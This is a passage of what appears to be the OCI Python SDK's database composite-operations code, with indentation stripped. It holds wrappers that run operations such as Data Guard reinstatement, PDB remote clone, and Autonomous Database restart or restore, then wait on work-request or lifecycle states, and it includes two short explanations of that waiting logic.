:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.modify_database_management(database_id, modify_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def modify_database_management_and_wait_for_state(self, database_id, modify_database_management_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.modify_database_management` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ModifyDatabaseManagementDetails modify_database_management_details: (required)
The data to update one or more attributes of the Database Management Service for the database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.modify_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.modify_database_management(database_id, modify_database_management_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def register_autonomous_database_data_safe_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.register_autonomous_database_data_safe` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.register_autonomous_database_data_safe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.register_autonomous_database_data_safe(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_autonomous_container_database_dataguard_association_and_wait_for_work_request(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_autonomous_container_database_dataguard_association_and_wait_for_state(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database_dataguard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, reinstate_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ReinstateDataGuardAssociationDetails reinstate_data_guard_association_details: (required)
A request to reinstate a database in a standby role.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_data_guard_association(database_id, data_guard_association_id, reinstate_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def reinstate_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, reinstate_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ReinstateDataGuardAssociationDetails reinstate_data_guard_association_details: (required)
A request to reinstate a database in a standby role.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.reinstate_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.reinstate_data_guard_association(database_id, data_guard_association_id, reinstate_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def remote_clone_pluggable_database_and_wait_for_work_request(self, remote_clone_pluggable_database_details, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param oci.database.models.RemoteClonePluggableDatabaseDetails remote_clone_pluggable_database_details: (required)
Request to clone a pluggable database (PDB) to a different database (CDB) from the source PDB.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remote_clone_pluggable_database(remote_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
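The ``*_and_wait_for_work_request`` composites above all share the same decision logic: fall back to the SDK's termination states when the caller passes none, then compare the work request's status case-insensitively. A minimal sketch of that logic follows; ``SimpleNamespace`` stands in for the SDK response object and the state list mirrors (but is not) ``oci.waiter._WORK_REQUEST_TERMINATION_STATES``:

```python
from types import SimpleNamespace

# Illustrative stand-in for oci.waiter._WORK_REQUEST_TERMINATION_STATES.
TERMINATION_STATES = ["SUCCEEDED", "FAILED", "CANCELED"]

def should_stop_waiting(response, work_request_states=None):
    # Default to the termination states when no states are supplied,
    # mirroring the composite operations above.
    states = work_request_states if work_request_states else TERMINATION_STATES
    lowered = [s.lower() for s in states]
    status = getattr(response.data, 'status', None)
    # Same shape as the evaluate_response lambda: truthy status, lowercase match.
    return bool(status) and status.lower() in lowered

in_progress = SimpleNamespace(data=SimpleNamespace(status="IN_PROGRESS"))
succeeded = SimpleNamespace(data=SimpleNamespace(status="Succeeded"))

print(should_stop_waiting(in_progress))            # False: still running
print(should_stop_waiting(succeeded))              # True: terminal, case-insensitive
print(should_stop_waiting(succeeded, ["FAILED"]))  # False: not in the requested states
```

Note that because failure states (``FAILED``, ``CANCELED``) are among the defaults, the waiter stops on failure too; callers should still inspect the returned work request's status.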
def remote_clone_pluggable_database_and_wait_for_state(self, remote_clone_pluggable_database_details, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.RemoteClonePluggableDatabaseDetails remote_clone_pluggable_database_details: (required)
Request to clone a pluggable database (PDB) to a different database (CDB) from the source PDB.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remote_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remote_clone_pluggable_database(remote_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
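The companion ``*_and_wait_for_state`` composites poll the resource itself and stop when its ``lifecycle_state`` matches one of the requested states, again case-insensitively; with an empty ``wait_for_states`` they return the operation result immediately. A sketch of that predicate, with ``SimpleNamespace`` standing in for the SDK response:

```python
from types import SimpleNamespace

def reaches_state(response, wait_for_states):
    """Mirror of the evaluate_response lambda used by the *_and_wait_for_state
    composites: stop once lifecycle_state matches one of the requested states."""
    lowered = [w.lower() for w in wait_for_states]
    state = getattr(response.data, 'lifecycle_state', None)
    return bool(state) and state.lower() in lowered

provisioning = SimpleNamespace(data=SimpleNamespace(lifecycle_state="PROVISIONING"))
available = SimpleNamespace(data=SimpleNamespace(lifecycle_state="AVAILABLE"))

print(reaches_state(provisioning, ["AVAILABLE"]))  # False: keep polling
print(reaches_state(available, ["available"]))     # True: comparison is case-insensitive
```

Unlike the work-request variant, there is no default state list here, so passing only the success state (e.g. ``AVAILABLE``) means a resource that ends in ``FAILED`` will be polled until the waiter times out.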
def remove_virtual_machine_from_vm_cluster_and_wait_for_work_request(self, remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.RemoveVirtualMachineFromVmClusterDetails remove_virtual_machine_from_vm_cluster_details: (required)
Request to remove Virtual Machines from the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remove_virtual_machine_from_vm_cluster(remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def remove_virtual_machine_from_vm_cluster_and_wait_for_state(self, remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param oci.database.models.RemoveVirtualMachineFromVmClusterDetails remove_virtual_machine_from_vm_cluster_details: (required)
Request to remove Virtual Machines from the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.remove_virtual_machine_from_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.remove_virtual_machine_from_vm_cluster(remove_virtual_machine_from_vm_cluster_details, vm_cluster_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_container_database_and_wait_for_work_request(self, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_container_database(autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_container_database_and_wait_for_state(self, autonomous_container_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_container_database(autonomous_container_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restart_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restart_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restart_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restart_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, restore_autonomous_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreAutonomousDatabaseDetails restore_autonomous_database_details: (required)
Request to perform an Autonomous Database restore.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_autonomous_database(autonomous_database_id, restore_autonomous_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def restore_autonomous_database_and_wait_for_state(self, autonomous_database_id, restore_autonomous_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.restore_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.RestoreAutonomousDatabaseDetails restore_autonomous_database_details: (required)
Request to perform an Autonomous Database restore.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.restore_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.restore_autonomous_database(autonomous_database_id, restore_autonomous_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
